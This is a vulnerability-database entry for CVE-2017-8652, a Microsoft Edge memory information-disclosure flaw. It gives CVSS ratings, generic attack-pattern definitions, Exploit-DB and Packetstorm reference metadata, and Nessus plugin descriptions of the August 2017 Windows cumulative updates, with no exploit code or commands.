Vulnerabilities > CVE-2017-8652 - Information Exposure vulnerability in Microsoft Edge
Attack vector
NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
NONE Availability impact
NONE Summary
Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, 1703, and Windows Server 2016 allows an attacker to disclose information due to the way that Microsoft Edge handles objects in memory, aka "Microsoft Edge Information Disclosure Vulnerability". This CVE ID is unique from CVE-2017-8644 and CVE-2017-8662.
Vulnerable Configurations
Part | Description | Count |
---|---|---|
Application | 1 | |
OS | 5 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Subverting Environment Variable Values The attacker directly or indirectly modifies environment variables used by or controlling the target software. The attacker's goal is to cause the target software to deviate from its expected operation in a manner that benefits the attacker.
- Footprinting An attacker engages in probing and exploration activity to identify constituents and properties of the target. Footprinting is a general term to describe a variety of information gathering techniques, often used by attackers in preparation for some attack. It consists of using tools to learn as much as possible about the composition, configuration, and security mechanisms of the targeted application, system or network. Information that might be collected during a footprinting effort could include open ports, applications and their versions, network topology, and similar information. While footprinting is not intended to be damaging (although certain activities, such as network scans, can sometimes cause disruptions to vulnerable applications inadvertently) it may often pave the way for more damaging attacks.
- Exploiting Trust in Client (aka Make the Client Invisible) An attack of this type exploits a programs' vulnerabilities in client/server communication channel authentication and data integrity. It leverages the implicit trust a server places in the client, or more importantly, that which the server believes is the client. An attacker executes this type of attack by placing themselves in the communication channel between client and server such that communication directly to the server is possible where the server believes it is communicating only with a valid client. There are numerous variations of this type of attack.
- Browser Fingerprinting An attacker carefully crafts small snippets of Java Script to efficiently detect the type of browser the potential victim is using. Many web-based attacks need prior knowledge of the web browser including the version of browser to ensure successful exploitation of a vulnerability. Having this knowledge allows an attacker to target the victim with attacks that specifically exploit known or zero day weaknesses in the type and version of the browser used by the victim. Automating this process via Java Script as a part of the same delivery system used to exploit the browser is considered more efficient as the attacker can supply a browser fingerprinting method and integrate it with exploit code, all contained in Java Script and in response to the same web page request by the browser.
- Session Credential Falsification through Prediction This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.
Exploit-Db
description | Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure. CVE-2017-8652. Dos exploit for Win_x86-64 platform |
file | exploits/windows_x86-64/dos/42445.html |
id | EDB-ID:42445 |
last seen | 2017-08-10 |
modified | 2017-08-10 |
platform | windows_x86-64 |
port | |
published | 2017-08-10 |
reporter | Exploit-DB |
source | https://www.exploit-db.com/download/42445/ |
title | Microsoft Edge 38.14393.1066.0 - 'textarea.defaultValue' Memory Disclosure |
type | dos |
Nessus
NASL family Windows : Microsoft Bulletins NASL id SMB_NT_MS17_AUG_4034660.NASL description The remote Windows host is missing security update 4034660. It is, therefore, affected by multiple vulnerabilities : - A denial of service vulnerability exists when Microsoft Windows improperly handles NetBIOS packets. An attacker who successfully exploited this vulnerability could cause a target computer to become completely unresponsive. A remote unauthenticated attacker could exploit this vulnerability by sending a series of TCP packets to a target system, resulting in a permanent denial of service condition. The update addresses the vulnerability by correcting how the Windows network stack handles NetBIOS traffic. (CVE-2017-0174) - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-0250) - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-0293) - An elevation of privilege vulnerability exists in Microsoft Edge that could allow an attacker to escape from the AppContainer sandbox in the browser. An attacker who successfully exploited this vulnerability could gain elevated privileges and break out of the Edge AppContainer sandbox.The vulnerability by itself does not allow arbitrary code to run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (for example a remote code execution vulnerability and another elevation of privilege vulnerability) to take advantage of the elevated privileges when running.The security update addresses the vulnerability by modifying how Microsoft Edge handles sandboxing. (CVE-2017-8503) - A remote code execution vulnerability exists in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled. An attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. (CVE-2017-8591) - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8593) - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.To exploit the vulnerability, the attacker could send specially crafted messages to the Windows Search service. An attacker with access to a target computer could exploit this vulnerability to elevate privileges and take control of the computer. Additionally, in an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer.The security update addresses the vulnerability by correcting how Windows Search handles objects in memory. (CVE-2017-8620) - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. (CVE-2017-8624) - A security feature bypass vulnerability exists when Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies. The vulnerability could allow an attacker to bypass Device Guard UCMI policies.To exploit the vulnerability, a user could either visit a malicious website or an attacker with access to the system could run a specially crafted application. An attacker could then leverage the vulnerability to run unsigned malicious code as though it were signed by a trusted source.The update addresses the vulnerability by correcting how Internet Explorer validates UMCI policies. (CVE-2017-8625) - This security update resolves a vulnerability in Windows Error Reporting (WER). The vulnerability could allow elevation of privilege if successfully exploited by an attacker. An attacker who successfully exploited this vulnerability could gain greater access to sensitive information and system functionality. This update corrects the way the WER handles and executes files. (CVE-2017-8633) - A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8635) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8636) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8640) - A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8641) - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8644) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8645) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8646) - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8652) - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8653) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8655) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8657) - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8664) - An information disclosure vulnerability exists when the win32k component improperly provides kernel information. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8666) - A remote code execution vulnerability exists in the way Microsoft browsers handle objects in memory while rendering content. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8669) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8671) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8672) last seen 2020-06-01 modified 2020-06-02 plugin id 102265 published 2017-08-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102265 title KB4034660: Windows 10 Version 1511 August 2017 Cumulative Update NASL family Windows : Microsoft Bulletins NASL id SMB_NT_MS17_AUG_4034674.NASL description The remote Windows host is missing security update 4034674. It is, therefore, affected by multiple vulnerabilities : - A denial of service vulnerability exists when Microsoft Windows improperly handles NetBIOS packets. An attacker who successfully exploited this vulnerability could cause a target computer to become completely unresponsive. (CVE-2017-0174) - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take complete control of an affected system. (CVE-2017-0250) - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-0293) - An elevation of privilege vulnerability exists in Microsoft Edge that could allow an attacker to escape from the AppContainer sandbox in the browser. An attacker who successfully exploited this vulnerability could gain elevated privileges and break out of the Edge AppContainer sandbox. (CVE-2017-8503) - A remote code execution vulnerability exists in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled. An attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. (CVE-2017-8591) - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. (CVE-2017-8593) - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8620) - An elevation of privilege vulnerability exists in the way that the Windows Subsystem for Linux handles NT pipes. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2017-8622) - A denial of service vulnerability exists when Microsoft Hyper-V Network Switch on a host server fails to properly validate input from a privileged user on a guest operating system. An attacker who successfully exploited the vulnerability could cause the host server to crash. (CVE-2017-8623) - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. (CVE-2017-8624) - A denial of service vulnerability exists when Windows Subsystem for Linux improperly handles objects in memory. An attacker who successfully exploited this vulnerability could cause a denial of service against the local system.A attacker could exploit this vulnerability by running a specially crafted application.The update addresses the vulnerability by correcting how Windows Subsystem for Linux handles objects in memory. (CVE-2017-8627) - This security update resolves a vulnerability in Windows Error Reporting (WER). The vulnerability could allow elevation of privilege if successfully exploited by an attacker. An attacker who successfully exploited this vulnerability could gain greater access to sensitive information and system functionality. This update corrects the way the WER handles and executes files. (CVE-2017-8633) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8634) - A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8635) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8636) - A security feature bypass vulnerability exists in Microsoft Edge as a result of how memory is accessed in code compiled by the Edge Just-In-Time (JIT) compiler that allows Arbitrary Code Guard (ACG) to be bypassed. (CVE-2017-8637) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8638) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8639) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8640) - A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8641) - An elevation of privilege vulnerability exists when Microsoft Edge does not properly validate JavaScript under specific conditions, potentially allowing script to run with elevated privileges. (CVE-2017-8642) - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8644) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8645) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8646) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8647) - A security feature bypass vulnerability exists when Microsoft Edge does not properly enforce same-origin policies, which could allow an attacker to access information from origins outside the current one. In a web-based attack scenario, an attacker could trick a user into loading a webpage with malicious content. (CVE-2017-8650) - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8652) - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8653) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8655) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8656) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8657) - An information disclosure vulnerability exists when the Chakra scripting engine does not properly handle objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8659) - A remote code execution vulnerability exists in the way affected Microsoft scripting engines render when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8661) - An information disclosure vulnerability for Microsoft Edge exists as a result of how strings are validated in specific scenarios, which can allow an attacker to read sensitive data from memory and thereby potentially bypass Address Space Layout Randomization (ASLR). (CVE-2017-8662) - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8664) - An information disclosure vulnerability exists when the win32k component improperly provides kernel information. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8666) - A remote code execution vulnerability exists in the way Microsoft browsers handle objects in memory while rendering content. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8669) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8670) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8671) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8672) - A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests. (CVE-2017-8673) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8674) last seen 2020-06-01 modified 2020-06-02 plugin id 102269 published 2017-08-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102269 title KB4034674: Windows 10 Version 1703 August 2017 Cumulative Update NASL family Windows : Microsoft Bulletins NASL id SMB_NT_MS17_AUG_4034658.NASL description The remote Windows host is missing security update 4034658. It is, therefore, affected by multiple vulnerabilities : - A denial of service vulnerability exists when Microsoft Windows improperly handles NetBIOS packets. An attacker who successfully exploited this vulnerability could cause a target computer to become completely unresponsive. A remote unauthenticated attacker could exploit this vulnerability by sending a series of TCP packets to a target system, resulting in a permanent denial of service condition. The update addresses the vulnerability by correcting how the Windows network stack handles NetBIOS traffic. (CVE-2017-0174) - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-0250) - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-0293) - An elevation of privilege vulnerability exists in Microsoft Edge that could allow an attacker to escape from the AppContainer sandbox in the browser. An attacker who successfully exploited this vulnerability could gain elevated privileges and break out of the Edge AppContainer sandbox.The vulnerability by itself does not allow arbitrary code to run. However, this vulnerability could be used in conjunction with one or more vulnerabilities (for example a remote code execution vulnerability and another elevation of privilege vulnerability) to take advantage of the elevated privileges when running.The security update addresses the vulnerability by modifying how Microsoft Edge handles sandboxing. (CVE-2017-8503) - A remote code execution vulnerability exists in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled. An attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. (CVE-2017-8591) - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8593) - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.To exploit the vulnerability, the attacker could send specially crafted messages to the Windows Search service. An attacker with access to a target computer could exploit this vulnerability to elevate privileges and take control of the computer. Additionally, in an enterprise scenario, a remote unauthenticated attacker could remotely trigger the vulnerability through an SMB connection and then take control of a target computer.The security update addresses the vulnerability by correcting how Windows Search handles objects in memory. (CVE-2017-8620) - A denial of service vulnerability exists when Microsoft Hyper-V Network Switch on a host server fails to properly validate input from a privileged user on a guest operating system. An attacker who successfully exploited the vulnerability could cause the host server to crash. (CVE-2017-8623) - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory.(CVE-2017-8624) - A security feature bypass vulnerability exists when Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies. The vulnerability could allow an attacker to bypass Device Guard UCMI policies.To exploit the vulnerability, a user could either visit a malicious website or an attacker with access to the system could run a specially crafted application. An attacker could then leverage the vulnerability to run unsigned malicious code as though it were signed by a trusted source.The update addresses the vulnerability by correcting how Internet Explorer validates UMCI policies. (CVE-2017-8625) - This security update resolves a vulnerability in Windows Error Reporting (WER). The vulnerability could allow elevation of privilege if successfully exploited by an attacker. An attacker who successfully exploited this vulnerability could gain greater access to sensitive information and system functionality. This update corrects the way the WER handles and executes files. (CVE-2017-8633) - A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8635) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8636) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8639) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8640) - A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8641) - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8644) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8645) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8646) - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8652) - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8653) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8655) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8656) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8657) - A remote code execution vulnerability exists in the way affected Microsoft scripting engines render when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8661) - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8664) - An information disclosure vulnerability exists when the win32k component improperly provides kernel information. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8666) - A remote code execution vulnerability exists in the way Microsoft browsers handle objects in memory while rendering content. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8669) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8670) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8671) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. (CVE-2017-8672) last seen 2020-06-01 modified 2020-06-02 plugin id 102264 published 2017-08-08 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/102264 title KB4034658: Windows 10 Version 1607 and Windows Server 2016 August 2017 Cumulative Update NASL family Windows : Microsoft Bulletins NASL id SMB_NT_MS17_AUG_4034668.NASL description The remote Windows host is missing security update 4034668. It is, therefore, affected by multiple vulnerabilities : - A remote code execution vulnerability exists when Windows Search handles objects in memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8620) - An elevation of privilege vulnerability exists when the Windows Common Log File System (CLFS) driver improperly handles objects in memory. (CVE-2017-8624) - A remote code execution vulnerability exists in the way JavaScript engines render when handling objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8635, CVE-2017-8641) - An information disclosure vulnerability exists when the win32k component improperly provides kernel information. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8666) - A security feature bypass vulnerability exists when Internet Explorer fails to validate User Mode Code Integrity (UMCI) policies. The vulnerability could allow an attacker to bypass Device Guard UMCI policies. (CVE-2017-8625) - A remote code execution vulnerability exists in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled. An attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. (CVE-2017-8591) - A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system. (CVE-2017-8664) - A denial of service vulnerability exists when Microsoft Windows improperly handles NetBIOS packets. An attacker who successfully exploited this vulnerability could cause a target computer to become completely unresponsive. A remote unauthenticated attacker could exploit this vulnerability by sending a series of TCP packets to a target system, resulting in a permanent denial of service condition. The update addresses the vulnerability by correcting how the Windows network stack handles NetBIOS traffic. (CVE-2017-0174) - A buffer overflow vulnerability exists in the Microsoft JET Database Engine that could allow remote code execution on an affected system. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. (CVE-2017-0250) - A remote code execution vulnerability exists in the way Microsoft browsers handle objects in memory while rendering content. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8669) - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it. An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2017-8633) - A remote code execution vulnerability exists when Microsoft browsers improperly access objects in memory. The vulnerability could corrupt memory in such a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8653) - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-8593) - A remote code execution vulnerability exists in the way that Microsoft browser JavaScript engines render content when handling objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Microsoft browsers and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the related rendering engine. The attacker could also take advantage of compromised websites, and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2017-8636, CVE-2017-8640, CVE-2017-8655, CVE-2017-8672) - A remote code execution vulnerability exists when Microsoft Windows PDF Library improperly handles objects in memory. The vulnerability could corrupt memory in a way that enables an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2017-0293) - An information disclosure vulnerability exists when Microsoft Edge improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2017-8644, CVE-2017-8652) last seen 2020-06-01 modified 2020-06-02 plugin id 104382 published 2017-11-03 reporter This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof. source https://www.tenable.com/plugins/nessus/104382 title KB4034668: Windows 10 August 2017 Cumulative Update
Packetstorm
data source | https://packetstormsecurity.com/files/download/143695/GS20170810135026.txt |
id | PACKETSTORM:143695 |
last seen | 2017-08-11 |
published | 2017-08-10 |
reporter | Ivan Fratric |
